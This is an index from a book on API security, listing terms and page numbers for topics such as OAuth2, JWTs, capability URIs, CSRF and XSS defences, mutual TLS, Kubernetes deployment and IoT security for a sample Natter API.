brew cask install virtualbox command 533
brew install linkerd command 372
brew install maven command 524
brew install minikube command 533
brew tap adoptopenjdk/openjdk command 524
browser-based clients, capability URIs for 311–312
brute-force attacks 72, 96, 202
buffer overflow attacks 48
buffer overrun 48
BUFFER_OVERFLOW 448
BUFFER_UNDERFLOW 448
build section 349
By field 407
ByteBuffer.allocateDirect() method 483
C
-c option 124
- -cacert option 81
Cache-Control header 58
capabilities 22, 295, 347
capability URIs
combining capabilities with identity 314–315
defined 300
for browser-based clients 311–312
hardening 315–318
in Natter API 303–307
returning capability URIs 305–306
validating capabilities 306–307
REST APIs and 299–302
capability-based access control 22
capability-based security 331
macaroons 319–330
contextual caveats 321
first-party caveats 325–328
macaroon token store 322–324
third-party caveats 328–330
REST and 297–318
capabilities as URIs 299–302
capability URIs for browser-based clients
311–312
combining capabilities with identity 314–315
hardening capability URIs 315–318
Hypertext as Engine of Application State
(HATEOAS) 308–311
using capability URIs in Natter API 303–307
CapabilityController 304–306, 312, 324
CAs (certificate authorities) 80, 245, 369, 397,
443, 479
CAT (Crypto Auth Tokens) 428
cat command 295
caveats
contextual 321
first-party 325–328
third-party 328–330
answers to exercises 330
creating 329–330
CBC (Cipher Block Chaining) 201
CBOR (Concise Binary Object
Representation) 469, 496
CBOR Object Signing and Encryption
(COSE) 468–474, 496, 499
CCM mode 455
Cert field 407
certificate authorities (CAs) 80, 245, 369, 397,
443, 479
certificate chain 370, 397
Certificate message 397
certificate-bound access tokens 410–414
CertificateFactory 402
certificate.getEncoded() method 411
CertificateRequest message 398–399
certificates 80, 397
CertificateVerify message 398
cert-manager 381
ChaCha20-Poly1305 cipher suites 456
Chain field 407
chain key 483
chaining key 483
challenge-response protocol 497
c_hash claim 263
checkDecision method 288
INDEX
538
checking URLs 363
checkPermitted method 286
Chooser API 297
chosen ciphertext attack 197
CIA Triad 14
Cipher Block Chaining (CBC) 201
Cipher object 421
cipher suites
for constrained devices 452–457
supporting raw PSK 463–464
ciphers 195
CipherSweet library 178
ciphertext 195
claims, authenticating 21
Class.getResource() method 33
CLI (command-line interface) 372
client certificate authentication 399–401
client credentials 227
client credentials grant 228, 385, 387–388
client secrets 227
client_assertion parameter 394–395
client_credentials grant 386
client_id parameter 234, 242, 409, 513
clients
authenticating using JWT bearer grant 391–393
capability URIs for browser-based 311–312
implementing DTLS 443–450
managing service credentials 415–428
avoiding long-lived secrets on disk 423–425
key and secret management services 420–422
key derivation 425–428
Kubernetes secrets 415–420
of PSK 462–463
redirect URIs for 235–236
storing token state on 182–183
types of 227–228
client_secret_basic method 386
close-notify alert 449
closeOutbound() method 449
cnf claim 411
cnf field 412
CoAP (Constrained Application Protocol) 442,
499, 509
code challenge 236
code parameter 234
collision domains 368
collision resistance 130
Command-Query Responsibility Segregation
(CQRS) 178
Common Context 499
compareAndSet method 508
Concise Binary Object Representation (CBOR)
469, 496
confidential clients 227
confidentiality 14
ConfidentialTokenStore 207, 304, 323
confirmation key 411
confirmation method 411
confused deputy attacks 295, 299
connect() method 449, 460, 462
connected channels 448–449
connected TVs 512
constant time 477
Constrained Application Protocol (CoAP) 442,
499, 509
constrained devices 440
Consumer IoT 440
container images 341
container, Docker
building H2 database as 341–345
building Natter API as 349–353
Content-Security-Policy (CSP) 58, 169
Content-Type header 57
contextual caveats 321
control plane 371–372
controller objects 34
Cookie header 115
cookies
security attributes 121–123
tokens without 154–169
Bearer authentication scheme 160–162
deleting expired tokens 162–163
storing token state in database 155–160
storing tokens in Web Storage 163–166
updating CORS filter 166
XSS attacks on Web Storage 167–169
CookieTokenStore method 118–120, 124, 133–134,
136, 159, 171, 208, 315, 317
CORS (cross-origin resource sharing) 105–106
allowing cross-domain requests with 147–154
adding CORS headers to Natter API 151–154
CORS headers 150–151
preflight requests 148
defined 147
updating filter 166
COSE (CBOR Object Signing and
Encryption) 468–474, 496, 499
Counter Mode (CTR) 196
cp command 295
CQRS (Command-Query Responsibility
Segregation) 178
create method 239
CREATE USER command 46
createEngine() method 444
createSpace method 34, 40, 44, 50, 77, 91, 102,
104, 142, 163, 278, 305–306, 309, 319
createUri method 305
credentials attribute 21, 103
credentials field 153
CRIME attack 205
INDEX
539
CRLs (certificate revocation lists) 369
cross-origin requests 106
Crypto Auth Tokens (CAT) 428
CryptoBox algorithm 474, 496, 510
cryptographic agility 188–189
cryptographically bound tokens 130
cryptographically secure hash function 130
cryptographically-secure pseudorandom number
generator (CSPRNG) 201
cryptography 9
Crypto.hash() method 462
CSP (Content-Security-Policy) 58, 169
CSPRNG (cryptographically-secure pseudoran-
dom number generator) 201
CSRF (Cross-Site Request Forgery) attacks 125–138
double-submit cookies for Natter API 133–138
hash-based double-submit cookies 129–133
SameSite cookies 127–129
csrfToken cookie 141–142, 164
CTR (Counter Mode) 196
cut utility 327
D
DAC (discretionary access control) 223, 267
data encryption key (DEK) 421
data plane 372
Database object 33–34, 37
Database.forDataSource() method 33
databases
for passwords 72–74
initializing Natter API 32–33
storing token state in 155–160
DatabaseTokenStore 155–156, 158–159, 171,
174–175, 177–178, 183, 208, 210–211, 213,
304, 322
dataflow diagrams 17
Datagram TLS (DTLS) 441–452, 488
DatagramChannel 447, 449, 451
DataSource interface 33, 46
DBMS (database management system) 17–18
DDoS (distributed DoS) attack 64
Decision class 283–284, 287
decision global variable 288
decodeCert method 413
decrypt() method 478
decryptToString() method 198
default permit strategy 284
defense in depth 66
DEK (data encryption key) 421
delegated authorization 223
delegation semantics 431
DELETE methods 289
deleting expired tokens 162–163
denial of service 18
deny() method 284, 286, 288
description property 354
developer portal 384
device authorization grant 512–516
Device class 491
device code 513
device flow grant 228, 512
device onboarding 490
DeviceIdentityManager class 493
devices
authenticating with TLS connection 492–496
device certificates 492
identifiers 489–492
dictionary attacks 72, 96
differential power analysis 477
Diffie-Hellman key agreement 485
DirectDecrypter 204
DirectEncrypter object 203
discharge macaroons 328
discretionary access control (DAC) 223, 267
Distinguished Name (DN) 272, 402
distributed DoS (DDoS) attack 64
distributed policy enforcement 290–291
distroless base image, Google 342
DN (Distinguished Name) 272, 402
-dname option 391
DNS (Domain Name System) 64
DNS amplification attacks 64
DNS cache poisoning attack 369
DNS field 407
DNS rebinding attacks 366–368
Docker
containers
building H2 database as 341–345
building Natter API as 349–353
installing 525
Docker registry secret 416
Dockerfile 342
doc.location() method 354
document.cookie field 140, 142
document.domain field 165
Domain attribute 121
Domain Name System (DNS) 64
domain-specific language (DSL) 285
DOM-based XSS attacks 54, 169
DoS (denial of service) attacks 13, 21, 24–25, 64
drag ‘n’ drop clickjacking attack 57
DroolsAccessController class 287
DROP TABLE command 42, 47
DSL (domain-specific language) 285
DTLS (Datagram TLS) 441–452, 488
DTLSClientProtocol 462
DtlsDatagramChannel class 448–449, 451, 457,
460
DTLSServerProtocol 461
INDEX
540
DTLSTransport 461–462
Duration argument 303
duty officer 275
Dynamic client registration endpoint 529
dynamic groups 272
dynamic roles 280–281
E
ECB (Electronic Code Book) 196
ECDH (Elliptic Curve Diffie-Hellman) 245, 452,
472
ECDHE-RSA-AES256-SHA384 452
ECDH-ES algorithm 257
ECDH-ES encryption 256
ECDH-ES+A128KW algorithm 257
ECDH-ES+A192KW algorithm 257
ECDH-ES+A256KW algorithm 257
ECDSA signatures 255
ECIES (Elliptic Curve Integrated Encryption
Scheme) 257
ECPrivateKey type 391
EdDSA (Edwards Curve Digital Signature Algo-
rithm) signatures 255
EEPROM (electrically erasable programmable
ROM) 480
effective top-level domains (eTLDs) 128
egress 375
EJBs (Enterprise Java Beans) 7
EK (Endorsement Key) 481
electrically erasable programmable ROM
(EEPROM) 480
Electronic Code Book (ECB) 196
elevation of privilege 18, 95
Elliptic Curve Diffie-Hellman (ECDH) 245, 452,
472
Elliptic Curve Integrated Encryption Scheme
(ECIES) 257
EmptyResultException 51
enc header 189, 201
encKey.getEncoded() method 200
encoding headers with end-to-end security 509–510
encrypt() method 478
EncryptedJWT object 203
EncryptedJwtTokenStore 205, 208, 211
EncryptedTokenStore 197–200, 205–206, 208
encryption 19–20, 63, 203
OSCORE message 504–506
private data 78–82
enabling HTTPS 80–81
strict transport security 82
sensitive attributes 195–205
authenticated encryption 197
authenticated encryption with NaCl 198–200
encrypted JWTs 200–202
Encrypt-then-MAC (EtM) 197
enctype attribute 55
Endorsement Key (EK) 481
endpoints, OAuth2 229–230
end-to-end authentication 496–510
avoiding replay in REST APIs 506–510
OSCORE 499–506
deriving context 500–503
encrypting message 504–506
generating nonces 503–504
end-to-end security 467–478
alternatives to COSE 472–474
COSE 468–472
MRAE 475–478
enforcePolicy method 288
Enterprise Java Beans (EJBs) 7
entity authentication 497
Entity Tag (ETag) header 507
entropy 157
ENTRYPOINT command 342
EnumSet class 92
envelope encryption 421
environments 16–18
epk header 257
equest.pathInfo() method 307
ES256 algorithm 391
establish secure defaults principle 74
ETag (Entity Tag) header 507
eTLDs (effective top-level domains) 128
EtM (Encrypt-then-MAC) 197
etSupportedVersions() method 460
eval() function 40
evaluation version, of ForgeRock Access
Management 526–531
exfiltration 167
exp claim 187, 191, 394
exp field 242
expired_token 516
Expires attribute 122
Expires header 58
eXtensible Access-Control Markup Language
(XACML) 290–291
external additional authenticated data 504
extract method 472, 501
extract-and-expand method 426
F
fault attack 477
federation protocol 72
fetchLinkPreview method 359
file descriptors 295
file exposure 420
findMessages method 310, 326
findOptional method 491
INDEX
541
fingerprint 411
FINISHED status 447
firewalls 10
first-party caveats 321, 325–328
first-party clients 111
followRedirects(false) method 365
ForgeRock Access Management 525–531
running evaluation version 526–531
setting up host alias 526
ForgeRock Directory Services 531
form submission, intercepting 104
forward secrecy 246
PSK with 465–467
ratcheting for 482–484
freshness 497
FROM command 341–342
- -from-file 416
future secrecy 484
G
GCM (Galois Counter Mode) 197, 201, 453
GDPR (General Data Protection Regulation) 4,
224
GeneralCaveatVerifier interface 326
generic secrets 416
getCookie function 142, 166
getDelegatedTask() method 447
getEncoded() method 460, 502
getHint() method 494
getIdentityManager() method 494
getItem(key) method 165
getrandom() method 157
getSecurityParametersConnection() method
495
getSecurityParametersHandshake() method
495
getSupportedCipherSuites() method 464
getSupportedVersions() method 462
GIDs (group IDs) 343, 350
GRANT command 46, 277
grants
client credentials grant 385–388
JWT bearer grant for OAuth2 389–396
client authentication 391–393
generating 393–395
service account authentication
395–396
grant_type parameter 233, 432, 515
-groupname secp256r1 argument 391
groupOfNames class 272
groupOfUniqueNames class 272
groupOfURLs class 272
groups 268–273
Guava, rate-limiting with 66
H
H2 database
building as Docker container 341–345
deploying to Kubernetes 345–349
halt() method 151
handshake 245, 397
hardening
capability URIs 315–318
code exchange with PKCE 236–237
database token storage 170–180
authenticating tokens with HMAC 172–177
hashing database tokens 170–171
protecting sensitive attributes 177–180
OIDC 263–264
hardware security module (HSM) 422, 480–481
Hash field 407
hash function 130
hash-based double-submit cookies 129–133
hash-based key derivation function (HKDF) 425,
469
hashing database tokens 170–171
hash.substring(1) method 312
HATEOAS (Hypertext as Engine of Application
State) 308–311
headers
encoding with end-to-end security 509–510
JOSE 188–190
algorithm header 188–189
specifying key in header 189–190
headless JWTs 188
HKDF (hash-based key derivation function) 425,
469
HKDF_Context_PartyU_nonce attribute 470
HKDF-Expand method 426
HKDF.expand() method 501
HKDF-Extract method 425, 501
HMAC (hash-based MAC)
authenticating tokens with 172–177
generating key 176–177
trying it out 177
protecting JSON tokens with 183
HmacKeyStore 177
HMAC-SHA256 algorithm 172
HmacTokenStore 173, 176, 183–184, 191–193,
197–198, 206, 208, 211, 304, 319, 323
holder-of-key tokens 410
host alias 526
host name 147
__Host prefix 123, 130
host-only cookie 121
HS256 algorithm 191
HSM (hardware security module) 422, 480–481
HSTS (HTTP Strict-Transport-Security) 82
HTML 105–108
INDEX
542
HTTP Basic authentication
drawbacks of 108
preventing spoofing with 71
HTTP OPTIONS request 148
HTTP Strict-Transport-Security (HSTS) 82
HttpClient class 247, 444
HttpOnly attribute 121
HTTPS 9
enabling 80–81
securing client configuration 245–247
hybrid tokens 210–213
Hypertext as Engine of Application State
(HATEOAS) 308–311
I
iat claim 187
IBAC (identity-based access control) 267–293
attribute-based access control (ABAC) 282–293
best practices for 291
combining decisions 284
distributed policy enforcement and
XACML 290–291
implementing decisions 285–288
policy agents and API gateways 289–290
role-based access control (RBAC) 274–281
determining user roles 279–280
dynamic roles 280–281
mapping roles to permissions 276–277
static roles 277–278
users and groups 268–273
ID tokens 260–262, 264–266
idempotent operations 506
identification 21–22
identity
combining capabilities with 314–315
verifying client identity 402–406
identity-based access control 22
idle timeouts 211
IDS (intrusion detection system) 10
IIoT (industrial IoT) 440
IllegalArgumentException 51
image property 354
img tag 167
impersonation 431
implicit grant 228
implicit nonces 453
import statement 287
in transit encryption 20
inactivity logout 211
indistinguishability 15
industrial IoT (IIoT) 440
Inet6Address class 363
InetAddress.getAllByName() method 363
information disclosure 18
InfoSec (Information security) 8
ingress controller 375, 377–378
init container 338
InitialDirContext 272
initialization vector (IV) 201, 475
injection attacks 39–47
mitigating SQL injection with permissions
45–47
preventing 43–45
.innerHTML attribute 169
input validation 47–51
InputStream argument 421
insecure deserialization vulnerability 48
- -insecure option 81
INSERT statement 41–42, 46
insert() method 286
insufficient_scope 221
int value 61
integrity 14
intermediate CAs 246, 369–370
Introspection endpoint 529
intrusion detection system (IDS) 10
intrusion prevention system (IPS) 10
invalid curve attacks 455
IoT (Internet of Things) 4, 65
IoT (Internet of Things) APIs 488–522
authenticating devices 489–496
device certificates 492
identifying devices 489–492
with TLS connection 492–496
end-to-end authentication 496–510
avoiding replay in REST APIs 506–510
Object Security for Constrained RESTful Envi-
ronments (OSCORE) 499–506
OAuth2 for constrained environments 511–517
offline access control 518–521
offline authorization 520–521
offline user authentication 518–520
IoT (Internet of Things) communications
439–487
end-to-end security 467–478
alternatives to COSE 472–474
COSE 468–472
misuse-resistant authenticated encryption
(MRAE) 475–478
key distribution and management 479–486
key distribution servers 481–482
one-off key provisioning 480–481
post-compromise security 484–486
ratcheting for forward secrecy 482–484
pre-shared keys (PSK) 458–467
clients 462–463
implementing servers 460–461
supporting raw PSK cipher suites 463–464
with forward secrecy 465–467
INDEX
543
IoT (Internet of Things) communications
(continued)
transport layer security (TLS) 440–457
cipher suites for constrained devices
452–457
Datagram TLS 441–452
IPS (intrusion prevention system) 10
isAfter method 326
isBlockedAddress 364
isInboundDone() method 450
isMemberOf attribute 273
iss claim 187, 253, 393, 395
Istio Gateway 408
IV (initialization vector) 201, 475
ivLength argument 502
J
Java 523–531
installing
Authorization Server 525–531
Docker 525
LDAP directory server 531
setting up 523–525
Linux 525
macOS 523–524
Windows 525
Java EE (Java Enterprise Edition) 10
java -version command 524
java.net.InetAddress class 363
java.net.URI class 303
JavaScript
calling login API from 140–142
calling Natter API from 102–104
java.security package 133
java.security.cert.X509Certificate object 402
java.security.egd property 350
java.security.MessageDigest class 411
java.security.SecureRandom 201
javax.crypto.Mac class 174, 320
javax.crypto.SecretKey class 205
javax.crypto.spec.SecretKeySpec class 426
javax.net.ssl.TrustManager 246
JdbcConnectionPool object 33
jku header 190
JOSE (JSON Object Signing and Encryption)
header 188–190
algorithm header 188–189
specifying key in header 189–190
jq utility 327
JSESSIONID cookie 141
JSON Web Algorithms (JWA) 185
JSON Web Encryption (JWE) 185
JSON Web Key (JWK) 185, 189
JSON Web Signatures (JWS) 185, 469
JSONException 51
JsonTokenStore 183, 187, 192, 198, 200, 203, 206,
208–209, 322
jti claim 187, 394
JWA (JSON Web Algorithms) 185
JWE (JSON Web Encryption) 185
JWEHeader object 203
JWK (JSON Web Key) 185, 189
jwk header 190
JWK Set URI 529
JWKSet.load method 392
jwks_uri field 252
JWS (JSON Web Signatures) 185, 469
JWS Compact Serialization 185
JWSAlgorithm object 191
JWSSigner object 191
JWSVerifier object 191, 193
JWT bearer authentication 384–385
JWT ID (jti) claim 211
JwtBearerClient class 391
JWTClaimsSet.Builder class 203
JWTs (JSON Web Tokens) 185–194, 389
bearer grant for OAuth2 396
client authentication 391–393
generating 393–395
service account authentication 395–396
encrypted 200–202, 256
generating standard 190–193
JOSE header 188–190
algorithm header 188–189
specifying key in header 189–190
standard claims 187–188
using library 203–205
validating access tokens 249–256
choosing signature algorithm 254–256
retrieving public key 254
validating signed 193–194
K
-k option 81
KDF (key derivation function) 425
KEK (key encryption key) 421
Kerckhoff’s Principle 195
key derivation function (KDF) 425
key distribution and management 479–486
derivation 425–428
generating for HMAC 176–177
key distribution servers 481–482
managing service credentials 420–422
one-off key provisioning 480–481
post-compromise security 484–486
ratcheting for forward secrecy 482–484
retrieving public keys 251–254
specifying in JOSE header 189–190
INDEX
544
key distribution servers 481–482
key encryption key (KEK) 421
key hierarchy 421
Key ID (KID) header 504
key management 415
Key object 174, 460
key rotation 189–190
key-driven cryptographic agility 189
KeyManager 443
KeyManagerFactory 450
keys 22
keys attribute 251
keys field 393
KeyStore object 246, 421
keytool command 199, 391
KID (Key ID) header 504
kid header 190, 428
KieServices.get().getKieClasspathContainer()
method 286
kit-of-parts design 186
KRACK attacks 475
kty attribute 189
kubectl apply command 346, 377
kubectl command-line application 533
kubectl create secret docker-registry 416
kubectl create secret tls 416
kubectl describe pod 417
kubectl get namespaces command 346
kubectl version - -client - -short command 533
Kubernetes
deploying Natter on 339–368
building H2 database as Docker
container 341–345
calling link-preview microservice 357–360
deploying database to Kubernetes
345–349
deploying new microservice 355–357
DNS rebinding attacks 366–368
link-preview microservice 353–354
preventing server-side request forgery
(SSRF) attacks 361–365
microservice APIs on 336
secrets 380, 415–420
securing incoming requests 381
securing microservice communications
368–377
locking down network connections
375–377
securing communications with TLS
368–369
using service mesh for TLS 370–374
setting up 532–534
Linux 533–534
MacOS 532–533
Windows 534
L
LANGSEC movement 48
lateral movement 375
layer-7 (Application-layer DoS attacks) 65
LDAP (Lightweight Directory Access Protocol) 72,
271
groups 271–273
installing directory server 531
Linkerd 372–374
linkerd annotation 372
linkerd check - -pre command 372
linkerd check command 372
link-local IP address 363
link-preview microservice 353–354, 357–360
LinkPreviewer class 367
links field 358
Linux
setting up Java and Maven on 525
setting up Kubernetes 533–534
Minikube 534
VirtualBox 534
List objects 403
list_files scope 224
load balancer 10
load event 104
load() method 421
localStorage object 164
login
building UI for Natter API 138–142
implementing token-based 112–115
login(username, password) function 140
logout 143–145
long-lived secrets 423–425
lookupPermissions method 279, 306, 316
loopback address 363
M
MAC (mandatory access control) 223, 267
MAC (message authentication code) 172, 456,
496, 504
macaroons 319–330
contextual caveats 321
first-party caveats 325–328
macaroon token store 322–324
third-party caveats 328–330
answers to exercises 330
creating 329–330
MacaroonsBuilder class 326, 329
MacaroonsBuilder.create() method 322
macaroon.serialize() method 322
MacaroonsVerifier 323
MacaroonTokenStore 324
macKey 192, 324
INDEX
545
macKey.getEncoded() method 322
macOS
setting up Java and Maven 523–524
setting up Kubernetes 532–533
Minikube 533
VirtualBox 532–533
MACSigner class 192
MACVerifier class 192–193
MAF (multi-factor authentication) 22
Main class 30, 34, 46, 51, 54, 75–76, 200, 318, 418
main() method 46, 59, 93, 280, 288, 318, 394–395,
418, 493–494
mandatory access control (MAC) 223, 267
man-in-the-middle (MitM) attack 485
marker interfaces 207
Maven 523, 531
installing
Authorization Server 525–531
Docker 525
LDAP directory server 531
setting up
Linux 525
macOS 523–524
Windows 525
max-age attribute 82, 122
max_time parameter 262
member attribute 272
member role 278
- -memory flag 344
message authentication 497
message authentication code (MAC) 172, 456,
496, 504
Message class 358
MessageDigest class 133
MessageDigest.equals 180
MessageDigest.isEqual method 134–135, 175, 413
messages table 32
microservice APIs in Kubernetes 335–382
deploying Natter on Kubernetes 339–368
building H2 database as Docker
container 341–345
building Natter API as Docker
container 349–353
calling link-preview microservice 357–360
deploying database to Kubernetes 345–349
deploying new microservice 355–357
DNS rebinding attacks 366–368
link-preview microservice 353–354
preventing server-side request forgery (SSRF)
attacks 361–365
securing incoming requests 377–381
securing microservice communications 368–377
locking down network connections 375–377
securing communications with TLS 368–369
using service mesh for TLS 370–374
microservices 3, 335
microservices architecture 8
Minikube
Linux 534
MacOS 533
Windows 534
minikube config set vm-driver virtualbox
command 533
minikube ip command 345, 360, 368
misuse-resistant authenticated encryption
(MRAE) 475–478
MitM (man-in-the-middle) attack 485
mkcert utility 80–81, 246, 379, 400, 402, 406, 451
mode of operation, block cipher 196
model-view-controller (MVC) 34
modern token-based authentication 146–180
allowing cross-domain requests with CORS
147–154
adding CORS headers to Natter API
151–154
CORS headers 150–151
preflight requests 148
hardening database token storage 170–180
authenticating tokens with HMAC 172–177
hashing database tokens 170–171
protecting sensitive attributes 177–180
tokens without cookies 154–169
Bearer authentication scheme 160–162
deleting expired tokens 162–163
storing token state in database 155–160
storing tokens in Web Storage 163–166
updating CORS filter 166
XSS attacks on Web Storage 167–169
monotonically increasing counters 497
MRAE (misuse-resistant authenticated
encryption) 475–478
mTLS (mutual TLS) 374, 396–414
certificate-bound access tokens 410–414
client certificate authentication 399–401
using service mesh 406–409
verifying client identity 402–406
with OAuth2 409–410
multicast delivery 441
multi-factor authentication (MAF) 22
multistage build, Docker 342
MVC (model-view-controller) 34
mvn clean compile exec:java command 38
N
-n option 415
NaCl (Networking and Cryptography
Library) 198–200, 473
name constraints 370
namespace 345
INDEX
546
Natter API 27–33, 62–97
access control 87–97
access control lists (ACLs) 90–92
adding new members to Natter space 94–95
avoiding privilege escalation attacks 95–97
enforcing 92–94
enforcing authentication 89
adding CORS headers to 151–154
adding scoped tokens to 220–222
addressing threats with security controls
63–64
audit logging for accountability 82–87
authentication to prevent spoofing 70–77
authenticating users 75–77
creating password database 72–74
HTTP Basic authentication 71
registering users in Natter API 74–75
secure password storage with Scrypt 72
building login UI 138–142
calling from JavaScript 102–104
deploying on Kubernetes 339–368
building H2 database as Docker
container 341–345
building Natter API as Docker
container 349–353
calling link-preview microservice 357–360
deploying database to Kubernetes 345–349
deploying new microservice 355–357
DNS rebinding attacks 366–368
link-preview microservice 353–354
preventing server-side request forgery (SSRF)
attacks 361–365
double-submit cookies for 133–138
encrypting private data 78–82
enabling HTTPS 80–81
strict transport security 82
implementation 29
initializing database 32–33
overview 28–29
rate-limiting for availability 64–69
setting up project 30–31
using capability URIs in 303–307
returning capability URIs 305–306
validating capabilities 306–307
natter-api namespace 345, 375, 380, 401
natter-api-service 367
natter-api-service.natter-api 367
natter_api_user permissions 73, 84
natter-tls namespace 380
nbf claim 187
NEED_TASK 447
NEED_UNWRAP 446
NEED_UNWRAP_AGAIN 447
NEED_WRAP 447
network connections, locking down 375–377
network policies, Kubernetes 375
Network security 8
network segmentation 368
Networking and Cryptography Library
(NaCl) 198–200, 473
network-level DoS attack 64
nextBytes() method 158
NFRs (non-functional requirements) 14
nginx.ingress.kubernetes.io/auth-tls-error-
page 400
nginx.ingress.kubernetes.io/auth-tls-pass-certifi-
cate-to-upstream 400
nginx.ingress.kubernetes.io/auth-tls-secret 400
nginx.ingress.kubernetes.io/auth-tls-verify-
client 400
nginx.ingress.kubernetes.io/auth-tls-verify-
depth 400
nodePort attribute 352
nodes, Kubernetes 337
nonce (number-used-once) 201, 262–263, 497
nonce() method 504
nonces 503–504
non-functional requirements (NFRs) 14
non-repudiation 14
NOT_HANDSHAKING 447
number-used-once (nonce) 201, 262–263, 497
O
OAEP (Optimal Asymmetric Encryption
Padding) 257
OAuth2 217–266
ACE-OAuth (Authorization for Constrained
Environments using OAuth2) 511–517
authorization code grant 230–238
hardening code exchange with Proof
Key for Code Exchange (PKCE)
236–237
redirect URIs for different types of
client 235–236
refresh tokens 237–238
client credentials grant 385–388
introducing 226–230
authorization grants 228–229
discovering OAuth2 endpoints 229–230
types of clients 227–228
JWT bearer grant for 389–396
client authentication 391–393
generating 393–395
service account authentication 395
mutual TLS (mTLS) with 409–410
OpenID Connect (OIDC) 260–266
hardening 263–264
ID tokens 260–262
passing ID tokens to APIs 264–266
INDEX
547
OAuth2 (continued)
scoped tokens 218–224
adding to Natter 220–222
difference between scopes and
permissions 223–224
single sign-on (SSO) 258–259
token exchange 431–435
validating access tokens 239–258
encrypted JWT 256
JWTs 249–256
letting AS decrypt tokens 258
securing HTTPS client configuration 245–247
token introspection 239–244
token revocation 248
OAuth2TokenStore 243, 248
Object array 272
object-oriented (OO) 296
ocaps (object-capability-based security) 296
OCSP (online certificate status protocol) 369
off-heap memory 483
offline access control 518–521
offline authorization 520–521
offline user authentication 518–520
OIDC (OpenID Connect) 185, 260–266, 497
hardening 263–264
ID tokens 260–262
passing ID tokens to APIs 264–266
onboarding 489
one-off key provisioning 480–481
online certificate status protocol (OCSP) 369
OO (object-oriented) 296
OP (OpenID Provider) 260–261
OPA (Open Policy Agent) 289
open redirect vulnerability 232, 364–365
OpenID Provider (OP) 260–261
Optimal Asymmetric Encryption Padding
(OAEP) 257
Optional class 112
Optional.empty() method 117
optional_no_ca option 414
OR operator 135
ORM (object-relational mapper) 45
OSCORE (Object Security for Constrained
RESTful Environments) 499–506
deriving context 500–503
encrypting message 504–506
generating nonces 503–504
Oscore class 502, 504
output
exploiting XSS Attacks 54–57
implementing protections 58–61
preventing XSS 57–58
producing safe 53–61
OWASP (Open Web Application Security
Project) 39
OWL (Web Ontology Language) 281
owner field 77
owner role 278
P
package statement 287
padding oracle attack 202
PAP (Policy Administration Point) 290
PartyU 470
PASETO 186
password hashing algorithm 72
passwords
creating database for 72–74
storage with Scrypt 72
Path attribute 121
path traversal 420
path traversal vulnerability 484
PDP (Policy Decision Point) 290
PEM (Privacy Enhanced Mail) 80
PEP (Policy Enforcement Point) 290
perfect forward secrecy 453
permissions 90
difference between scopes and 223–224
mapping roles to 276–277
mitigating SQL injection attacks with 45–47
permissions table 90, 269, 271, 277–278
permit() method 284, 286
perms attribute 307
persistent cookie 122
personally identifiable information (PII) 24
phantom token pattern 429–431
PII (personally identifiable information) 24
PIP (Policy Information Point) 290
PKCE (Proof Key for Code Exchange) 236–237
PKI (public key infrastructure) 369, 409, 479
pods 337
podSelector 375
POLA (principle of least authority) 45–46, 90,
250, 295
Policy Administration Point (PAP) 290
policy agents 289–290
Policy Decision Point (PDP) 290
Policy Enforcement Point (PEP) 290
Policy Information Point (PIP) 290
policy sets 290
PoP (proof-of-possession) tokens 410, 517
post-compromise security 484–486
postMessage operation 280
- -pre argument 372
preflight requests 148
prepared statements 43–44
pre-shared keys 455
.preventDefault() method 104
PRF (pseudorandom function) 475
INDEX
548
principle of defense in depth 66
principle of least authority (POLA) 45–46, 90,
250, 295
principle of least privilege 46
principle of separation of duties 84
Privacy Enhanced Mail (PEM) 80
private-use IP address 363
privilege escalation attacks 95–97
privilege separation 341
processResponse method 242, 413
prompt=login parameter 262
prompt=none parameter 262
Proof Key for Code Exchange (PKCE) 236–237
property attribute 354
PROTECTED header 470
pseudorandom function 425
PSK (pre-shared keys) 458–463, 467, 490, 492
clients 462–463
implementing servers 460–461
supporting raw PSK cipher suites 464
with forward secrecy 465–467
PskClient 494
pskId variable 494
PskServer 493
PSKTlsClient 462, 464
PSKTlsServer class 460, 495
public clients 227
public key encryption algorithms 195
public key infrastructure (PKI) 369, 409, 479
public keys 251–254
public suffix list 128
pw_hash column 73
Q
query language 8
QueryBuilder class 270
QUIC protocol (Quick UDP Internet
Connections) 442
quotas 24
R
rainbow table 75
random number generator (RNG) 157
ratcheting 482–484
RateLimiter class 67
rate-limiting 19, 24–26
answers to pop quiz questions 25–26
for availability 64–69
raw PSK cipher suites 463–464
raw public keys 455
RBAC (role-based access control) 274–281
determining user roles 279–280
dynamic roles 280–281
mapping roles to permissions 276–277
static roles 277–278
RCE (remote code execution) 48
read() method 194, 213, 252, 254, 325–326
readMessage method 359
read-only memory (ROM) 480
readOnlyRootFileSystem 347
realms 277
receive() method 446
Recipient Context 499
Recipient object 470
recvBuf 446
redirect URIs 235–236
redirect_uri parameter 234
ReDoS (regular expression denial of service)
attack 51
Referer header 78, 233, 263, 301–302, 311,
314
Referrer-Policy header 301
reflected XSS 53–54
reflection attacks 188, 471
refresh tokens 237–238
registerable domain 127
registering users in Natter API 74–75
regular expression denial of service (ReDoS)
attack 51
Relying Party (RP) 260–261
remote attestation 481
remote code execution (RCE) 48
Remote Method Invocation (RMI) 7
Remote Procedure Call (RPC) 7
RemoteJWKSet class 252–253
removeItem(key) method 165
replay 506–510
replay attacks 187–188, 496, 498
repudiation 18
request object 34, 509
requested_token_type parameter 432
request.session() method 116
request.session(false) method 120
request.session(true) method 119–120
requireAuthentication method 92, 138, 162
requirePermission method 270, 276, 279, 283
requireRole filter 276
requireScope method 221
resource owner (RO) 227
Resource Owner Password Credentials (ROPC)
grant 228
resource parameter 432
resource server (RS) 227
resources 14, 282
Response object 34
response_type parameter 231
response_type=device_code parameter 516
REST (REpresentational State Transfer) 8
INDEX
549
REST APIs 34–35
avoiding replay in 506–510
capability-based security and 297–302, 318
capabilities as URIs 299
capability URIs for browser-based clients
311–312
combining capabilities with identity
314–315
hardening capability URIs 315–318
Hypertext as Engine of Application State
(HATEOAS) 308–311
using capability URIs in Natter API 303–307
creating new space 34–35
wiring up endpoints 36–39
Retry-After header 67, 96
reverse proxy 10
Revocation endpoint 529
REVOKE command 46
revoke method 182, 203, 239, 248
revoking tokens 209–213
access tokens 248
implementing hybrid tokens 210–213
RMI (Remote Method Invocation) 7
RNG (random number generator) 157
RO (resource owner) 227
role_permissions table 277, 279
@RolesAllowed annotation 276
ROM (read-only memory) 480
root CA 369, 397
ROPC (Resource Owner Password Credentials)
grant 228
routes 36
row-level security policies 179
RowMapper method 85
RP (Relying Party) 260–261
RPC (Remote Procedure Call) 7
RS (resource server) 227
RSA1_5 algorithm 257
RSA-OAEP algorithm 257
RSA-OAEP-256 algorithm 257
RtlGenRandom() method 157
